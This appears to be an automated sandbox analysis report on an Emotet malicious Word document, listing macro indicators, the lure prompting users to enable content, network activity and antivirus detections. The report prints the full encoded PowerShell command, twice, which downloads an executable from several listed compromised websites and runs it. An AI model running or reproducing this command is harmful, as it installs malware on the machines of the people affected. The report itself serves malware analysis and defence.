Source: powershell.exe, 00000002.00000002.237385426.000001C999549000.00000004.00000020.sdmpString found in binary or memory: https://www.digicert.com/CPS0
Source: powershell.exe, 00000002.00000002.246121001.000001C99C57D000.00000004.00000001.sdmp, 284.exe.2.drString found in binary or memory: https://www.networksolutions.com/cgi-bin/promo/domain-search?domainNames=blockchainjoblist.com&searc
Source: powershell.exe, 00000002.00000002.246621293.000001C99C99D000.00000004.00000001.sdmpString found in binary or memory: https://yeuquynhnhai.com
Source: powershell.exe, 00000002.00000002.241499572.000001C99B513000.00000004.00000001.sdmp, powershell.exe, 00000002.00000002.243056984.000001C99BD06000.00000004.00000001.sdmp, powershell.exe, 00000002.00000002.239509332.000001C99B301000.00000004.00000001.sdmp, PowerShell_transcript.258555.Xq7HteuE.20201204105711.txt.2.drString found in binary or memory: https://yeuquynhnhai.com/upload/41830/
Source: powershell.exe, 00000002.00000002.246621293.000001C99C99D000.00000004.00000001.sdmpString found in binary or memory: https://yeuquynhnhai.comx
Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712

E-Banking Fraud:

barindex
Malicious encrypted Powershell command line foundShow sources
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -enco JABqAHIARgBoAEEAMAA9ACcAVwBmADEAcgBIAHoAJwA7ACQAdQBVAE0ATQBMAEkAIAA9ACAAJwAyADgANAAnADsAJABpAEIAdABqADQAOQBOAD0AJwBUAGgATQBxAFcAOABzADAAJwA7ACQARgB3AGMAQQBKAHMANgA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAdQBVAE0ATQBMAEkAKwAnAC4AZQB4AGUAJwA7ACQAUwA5AEcAegBSAHMAdABNAD0AJwBFAEYAQwB3AG4AbABHAHoAJwA7ACQAdQA4AFUAQQByADMAPQAmACgAJwBuACcAKwAnAGUAdwAnACsAJwAtAG8AYgBqAGUAYwB0ACcAKQAgAE4AZQBUAC4AdwBFAEIAQwBsAEkARQBuAHQAOwAkAHAATABqAEIAcQBJAE4ARQA9ACcAaAB0AHQAcAA6AC8ALwBiAGwAbwBjAGsAYwBoAGEAaQBuAGoAbwBiAGwAaQBzAHQALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAbgAvADAAMQA0ADAAOAAwAC8AQABoAHQAdABwAHMAOgAvAC8AdwBvAG0AZQBuAGUAbQBwAG8AdwBlAHIAbQBlAG4AdABwAGEAawBpAHMAdABhAG4ALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAbgAvAHAAYQBiAGEANQBxADUAMgAvAEAAaAB0AHQAcABzADoALwAvAGEAdABuAGkAbQBhAG4AdgBpAGwAbABhAC4AYwBvAG0ALwB3AHAALQBjAG8AbgB0AGUAbgB0AC8AMAA3ADMANwAzADUALwBAAGgAdAB0AHAAcwA6AC8ALwB5AGUAdQBxAHUAeQBuAGgAbgBoAGEAaQAuAGMAbwBtAC8AdQBwAGwAbwBhAGQALwA0ADEAOAAzADAALwBAAGgAdAB0AHAAcwA6AC8ALwBkAGUAZQBwAGkAawBhAHIAYQBpAC4AYwBvAG0ALwBqAHMALwA0AGIAegBzADYALwAnAC4AIgBzAFAATABgAGkAVAAiACgAJwBAACcAKQA7ACQAbAA0AHMASgBsAG8ARwB3AD0AJwB6AEkAUwBqAEUAbQBpAFAAJwA7AGYAbwByAGUAYQBjAGgAKAAkAFYAMwBoAEUAUABNAE0AWgAgAGkAbgAgACQAcABMAGoAQgBxAEkATgBFACkAewB0AHIAeQB7ACQAdQA4AFUAQQByADMALgAiAEQATwB3AGAATgBgAGwATwBhAEQAZgBpAGAATABlACIAKAAkAFYAMwBoAEUAUABNAE0AWgAsACAAJABGAHcAYwBBAEoAcwA2ACkAOwAkAEkAdgBIAEgAdwBSAGkAYgA9ACcAcwA1AFQAcwBfAGkAUAA4ACcAOwBJAGYAIAAoACgAJgAoACcARwAnACsAJwBlACcAKwAnAHQALQBJAHQAZQBtACcAKQAgACQARgB3AGMAQQBKAHMANgApAC4AIgBMAGUATgBgAGcAVABoACIAIAAtAGcAZQAgADIAMwA5ADMAMQApACAAewBbAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAIgBTAFQAYABBAHIAVAAiACgAJABGAHcAYwBBAEoAcwA2ACkAOwAkAHoARABOAHMAOAB3AGkAPQAnAEYAMwBXAHcAbwAwACcAOwBiAHIAZQBhAGsAOwAkAFQAVABKAHAAdABYAEIAPQAnAGkAagBsAFcAaABDAHoAUAAnAH0AfQBjAGEAdABjAGgAewB9AH0AJAB2AFoAegBpAF8AdQBBAHAAPQAnAGEARQBCAHQAcABqADQAJwA=

System Summary:

barindex
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
Source: Screenshot number: 4Screenshot OCR: Enable Editing and click Enable Content Page1 of 1 Owords 112 O Type here to search m % - I + 100
Source: Screenshot number: 4Screenshot OCR: Enable Content Page1 of 1 Owords 112 O Type here to search m % - I + 100% Ki E a a g wg sf -
Source: Screenshot number: 8Screenshot OCR: Enable Editing and click Enable Content D O O Owords It? O Type here to search Ki E a a g wg
Source: Screenshot number: 8Screenshot OCR: Enable Content D O O Owords It? O Type here to search Ki E a a g wg m % - I + '00% sf - @ q"
Source: Document image extraction number: 0Screenshot OCR: Enable Editing and click Enable Content
Source: Document image extraction number: 0Screenshot OCR: Enable Content
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFAF1450CAA2_2_00007FFAF1450CAA
Source: emotet.docOLE, VBA macro line: Sub autoopen()
Source: VBA code instrumentationOLE, VBA macro: Module zacGkX9, Function autoopenName: autoopen
Source: emotet.docOLE indicator, VBA macros: true
Source: emotet.docOLE indicator has summary info: false
Source: emotet.docOLE indicator has summary info: false
Source: emotet.docOLE indicator has summary info: false
Source: emotet.docOLE indicator has summary info: false
Source: emotet.docOLE indicator has summary info: false
Source: emotet.docOLE indicator has summary info: false
Source: emotet.docOLE indicator has summary info: false
Source: emotet.docOLE indicator has summary info: false
Source: emotet.docOLE indicator has summary info: false
Source: emotet.docOLE indicator has summary info: false
Source: emotet.docOLE indicator has summary info: false
Source: emotet.docOLE indicator has summary info: false
Source: emotet.docOLE indicator has summary info: false
Source: emotet.docOLE indicator application name: unknown
Source: emotet.docOLE indicator application name: unknown
Source: emotet.docOLE indicator application name: unknown
Source: emotet.docOLE indicator application name: unknown
Source: emotet.docOLE indicator application name: unknown
Source: emotet.docOLE indicator application name: unknown
Source: emotet.docOLE indicator application name: unknown
Source: emotet.docOLE indicator application name: unknown
Source: emotet.docOLE indicator application name: unknown
Source: emotet.docOLE indicator application name: unknown
Source: emotet.docOLE indicator application name: unknown
Source: emotet.docOLE indicator application name: unknown
Source: emotet.docOLE indicator application name: unknown
Source: classification engineClassification label: mal100.bank.troj.evad.winDOC@5/62@9/5
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.WordJump to behavior
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2148:120:WilError_01
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\{EED15C15-23FD-49A4-B053-81857E0A36A3} - OProcSessId.datJump to behavior
Source: emotet.docOLE document summary: title field not present or empty
Source: emotet.docOLE document summary: author field not present or empty
Source: emotet.docOLE document summary: edited time not present or 0
Source: emotet.docOLE document summary: title field not present or empty
Source: emotet.docOLE document summary: author field not present or empty
Source: emotet.docOLE document summary: edited time not present or 0
Source: emotet.docOLE document summary: title field not present or empty
Source: emotet.docOLE document summary: author field not present or empty
Source: emotet.docOLE document summary: edited time not present or 0
Source: emotet.docOLE document summary: title field not present or empty
Source: emotet.docOLE document summary: author field not present or empty
Source: emotet.docOLE document summary: edited time not present or 0
Source: emotet.docOLE document summary: title field not present or empty
Source: emotet.docOLE document summary: author field not present or empty
Source: emotet.docOLE document summary: edited time not present or 0
Source: emotet.docOLE document summary: title field not present or empty
Source: emotet.docOLE document summary: author field not present or empty
Source: emotet.docOLE document summary: edited time not present or 0
Source: emotet.docOLE document summary: title field not present or empty
Source: emotet.docOLE document summary: author field not present or empty
Source: emotet.docOLE document summary: edited time not present or 0
Source: emotet.docOLE document summary: title field not present or empty
Source: emotet.docOLE document summary: author field not present or empty
Source: emotet.docOLE document summary: edited time not present or 0
Source: emotet.docOLE document summary: title field not present or empty
Source: emotet.docOLE document summary: author field not present or empty
Source: emotet.docOLE document summary: edited time not present or 0
Source: emotet.docOLE document summary: title field not present or empty
Source: emotet.docOLE document summary: author field not present or empty
Source: emotet.docOLE document summary: edited time not present or 0
Source: emotet.docOLE document summary: title field not present or empty
Source: emotet.docOLE document summary: author field not present or empty
Source: emotet.docOLE document summary: edited time not present or 0
Source: emotet.docOLE document summary: title field not present or empty
Source: emotet.docOLE document summary: author field not present or empty
Source: emotet.docOLE document summary: edited time not present or 0
Source: emotet.docOLE document summary: title field not present or empty
Source: emotet.docOLE document summary: author field not present or empty
Source: emotet.docOLE document summary: edited time not present or 0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dllJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: emotet.docVirustotal: Detection: 74%
Source: emotet.docMetadefender: Detection: 35%
Source: emotet.docReversingLabs: Detection: 72%
Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE 'C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE' /Automation -Embedding
Source: unknownProcess created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -enco JABqAHIARgBoAEEAMAA9ACcAVwBmADEAcgBIAHoAJwA7ACQAdQBVAE0ATQBMAEkAIAA9ACAAJwAyADgANAAnADsAJABpAEIAdABqADQAOQBOAD0AJwBUAGgATQBxAFcAOABzADAAJwA7ACQARgB3AGMAQQBKAHMANgA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAdQBVAE0ATQBMAEkAKwAnAC4AZQB4AGUAJwA7ACQAUwA5AEcAegBSAHMAdABNAD0AJwBFAEYAQwB3AG4AbABHAHoAJwA7ACQAdQA4AFUAQQByADMAPQAmACgAJwBuACcAKwAnAGUAdwAnACsAJwAtAG8AYgBqAGUAYwB0ACcAKQAgAE4AZQBUAC4AdwBFAEIAQwBsAEkARQBuAHQAOwAkAHAATABqAEIAcQBJAE4ARQA9ACcAaAB0AHQAcAA6AC8ALwBiAGwAbwBjAGsAYwBoAGEAaQBuAGoAbwBiAGwAaQBzAHQALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAbgAvADAAMQA0ADAAOAAwAC8AQABoAHQAdABwAHMAOgAvAC8AdwBvAG0AZQBuAGUAbQBwAG8AdwBlAHIAbQBlAG4AdABwAGEAawBpAHMAdABhAG4ALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAbgAvAHAAYQBiAGEANQBxADUAMgAvAEAAaAB0AHQAcABzADoALwAvAGEAdABuAGkAbQBhAG4AdgBpAGwAbABhAC4AYwBvAG0ALwB3AHAALQBjAG8AbgB0AGUAbgB0AC8AMAA3ADMANwAzADUALwBAAGgAdAB0AHAAcwA6AC8ALwB5AGUAdQBxAHUAeQBuAGgAbgBoAGEAaQAuAGMAbwBtAC8AdQBwAGwAbwBhAGQALwA0ADEAOAAzADAALwBAAGgAdAB0AHAAcwA6AC8ALwBkAGUAZQBwAGkAawBhAHIAYQBpAC4AYwBvAG0ALwBqAHMALwA0AGIAegBzADYALwAnAC4AIgBzAFAATABgAGkAVAAiACgAJwBAACcAKQA7ACQAbAA0AHMASgBsAG8ARwB3AD0AJwB6AEkAUwBqAEUAbQBpAFAAJwA7AGYAbwByAGUAYQBjAGgAKAAkAFYAMwBoAEUAUABNAE0AWgAgAGkAbgAgACQAcABMAGoAQgBxAEkATgBFACkAewB0AHIAeQB7ACQAdQA4AFUAQQByADMALgAiAEQATwB3AGAATgBgAGwATwBhAEQAZgBpAGAATABlACIAKAAkAFYAMwBoAEUAUABNAE0AWgAsACAAJABGAHcAYwBBAEoAcwA2ACkAOwAkAEkAdgBIAEgAdwBSAGkAYgA9ACcAcwA1AFQAcwBfAGkAUAA4ACcAOwBJAGYAIAAoACgAJgAoACcARwAnACsAJwBlACcAKwAnAHQALQBJAHQAZQBtACcAKQAgACQARgB3AGMAQQBKAHMANgApAC4AIgBMAGUATgBgAGcAVABoACIAIAAtAGcAZQAgADIAMwA5ADMAMQApACAAewBbAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAIgBTAFQAYABBAHIAVAAiACgAJABGAHcAYwBBAEoAcwA2ACkAOwAkAHoARABOAHMAOAB3AGkAPQAnAEYAMwBXAHcAbwAwACcAOwBiAHIAZQBhAGsAOwAkAFQAVABKAHAAdABYAEIAPQAnAGkAagBsAFcAaABDAHoAUAAnAH0AfQBjAGEAdABjAGgAewB9AH0AJAB2AFoAegBpAF8AdQBBAHAAPQAnAGEARQBCAHQAcABqADQAJwA=
Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288Jump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
Source: emotet.docInitial sample: OLE zip file path = word/media/image4.wmf
Source: emotet.docInitial sample: OLE zip file path = word/media/image1.wmf
Source: emotet.docInitial sample: OLE zip file path = word/media/image6.wmf
Source: emotet.docInitial sample: OLE zip file path = word/media/image2.wmf
Source: emotet.docInitial sample: OLE zip file path = word/media/image8.wmf
Source: emotet.docInitial sample: OLE zip file path = word/media/image5.wmf
Source: emotet.docInitial sample: OLE zip file path = word/media/image3.wmf
Source: emotet.docInitial sample: OLE zip file path = word/media/image9.wmf
Source: emotet.docInitial sample: OLE zip file path = word/media/image10.wmf
Source: emotet.docInitial sample: OLE zip file path = word/media/image11.wmf
Source: emotet.docInitial sample: OLE zip file path = word/media/image13.jpeg
Source: emotet.docInitial sample: OLE zip file path = word/activeX/activeX4.bin
Source: emotet.docInitial sample: OLE zip file path = word/activeX/activeX5.bin
Source: emotet.docInitial sample: OLE zip file path = word/activeX/activeX6.bin
Source: emotet.docInitial sample: OLE zip file path = word/activeX/activeX7.bin
Source: emotet.docInitial sample: OLE zip file path = word/activeX/activeX8.bin
Source: emotet.docInitial sample: OLE zip file path = word/activeX/activeX9.bin
Source: emotet.docInitial sample: OLE zip file path = word/activeX/activeX10.bin
Source: emotet.docInitial sample: OLE zip file path = word/activeX/activeX11.bin
Source: emotet.docInitial sample: OLE zip file path = word/activeX/activeX2.bin
Source: emotet.docInitial sample: OLE zip file path = word/activeX/activeX3.bin
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguagesJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dllJump to behavior
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb= source: powershell.exe, 00000002.00000002.247617370.000001C9B34C0000.00000004.00000001.sdmp
Source: Binary string: System.pdbq source: powershell.exe, 00000002.00000002.247708896.000001C9B368B000.00000004.00000001.sdmp
Source: Binary string: System.Management.Automation.pdbM source: powershell.exe, 00000002.00000002.247708896.000001C9B368B000.00000004.00000001.sdmp
Source: Binary string: System.pdb source: powershell.exe, 00000002.00000002.247708896.000001C9B368B000.00000004.00000001.sdmp
Source: emotet.docInitial sample: OLE indicators vbamacros = False

Persistence and Installation Behavior:

barindex
Creates processes via WMIShow sources
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
